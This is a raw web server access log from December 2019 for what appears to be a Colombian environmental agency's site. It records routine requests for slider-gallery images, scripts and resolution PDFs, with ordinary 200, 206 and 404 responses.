181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/demo/images/Bannercalculadora.jpg HTTP/1.1" 200 313099
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/demo/images/bannerwebmusgo.jpg HTTP/1.1" 200 367364
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/demo/images/banneragendamiento.jpg HTTP/1.1" 200 116897
181.50.129.88 - - [08/Dec/2019:01:02:29 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
181.50.129.88 - - [08/Dec/2019:01:02:29 -0500] "GET /galeria/nivo-slider/demo/images/banneriniciativa.jpg HTTP/1.1" 200 200385
54.36.150.9 - - [08/Dec/2019:01:02:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20301-350/312.tif HTTP/1.1" 200 52984
181.50.129.88 - - [08/Dec/2019:01:02:31 -0500] "GET /galeria/nivo-slider/demo/images/diciembrecaminatas.png HTTP/1.1" 200 510724
181.50.129.88 - - [08/Dec/2019:01:02:34 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20tinguas.jpg HTTP/1.1" 200 214878
181.50.129.88 - - [08/Dec/2019:01:02:34 -0500] "GET /galeria/nivo-slider/demo/images/Bannerserpiente2019.jpg HTTP/1.1" 200 270374
181.50.129.88 - - [08/Dec/2019:01:02:36 -0500] "GET /galeria/nivo-slider/demo/images/puntos%20atencion%20BANNER.jpg HTTP/1.1" 200 244208
66.249.64.59 - - [08/Dec/2019:01:02:36 -0500] "GET /sig/Gesti%C3%83%C2%B3n%20de%20Recursos%20F%C3%83%C2%ADsicos/126PA04-PR39.pdf HTTP/1.1" 404 1018
181.50.129.88 - - [08/Dec/2019:01:02:36 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Visor%20Geografico%20Ambiental.jpg HTTP/1.1" 200 204673
181.50.129.88 - - [08/Dec/2019:01:02:36 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20consumo%20sostenible%20final.jpg HTTP/1.1" 200 364746
181.50.129.88 - - [08/Dec/2019:01:02:36 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20RCD.jpg HTTP/1.1" 200 92197
181.50.129.88 - - [08/Dec/2019:01:02:37 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Conpes.jpg HTTP/1.1" 200 55220
181.50.129.88 - - [08/Dec/2019:01:02:37 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20practicas%20sostenibles.jpg HTTP/1.1" 200 142958
181.50.129.88 - - [08/Dec/2019:01:02:37 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20POT.png HTTP/1.1" 200 418238
181.50.129.88 - - [08/Dec/2019:01:02:38 -0500] "GET /galeria/nivo-slider/demo/images/Banneranonimos.png HTTP/1.1" 200 109388
181.50.129.88 - - [08/Dec/2019:01:02:39 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
190.24.16.75 - - [08/Dec/2019:01:03:03 -0500] "GET /silvicultura/1.pdf HTTP/1.1" 200 334952
190.24.16.75 - - [08/Dec/2019:01:03:14 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.64.59 - - [08/Dec/2019:01:03:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/6167.pdf HTTP/1.1" 200 968736
192.168.175.104 - - [08/Dec/2019:01:03:22 -0500] "GET / HTTP/1.1" 200 9990
181.50.129.88 - - [08/Dec/2019:01:03:53 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20consumo%20sostenible%20final.jpg HTTP/1.1" 206 1
181.50.129.88 - - [08/Dec/2019:01:03:53 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20POT.png HTTP/1.1" 206 1
181.50.129.88 - - [08/Dec/2019:01:03:53 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20consumo%20sostenible%20final.jpg HTTP/1.1" 206 100753
181.50.129.88 - - [08/Dec/2019:01:03:53 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20POT.png HTTP/1.1" 206 209724
181.50.129.88 - - [08/Dec/2019:01:03:59 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
181.50.129.88 - - [08/Dec/2019:01:03:59 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
66.249.64.59 - - [08/Dec/2019:01:04:14 -0500] "GET /sig/Gesti%C3%83%C2%B3n%20de%20Recursos%20F%C3%83%C2%ADsicos/126PA04-PR09.pdf HTTP/1.1" 404 1018
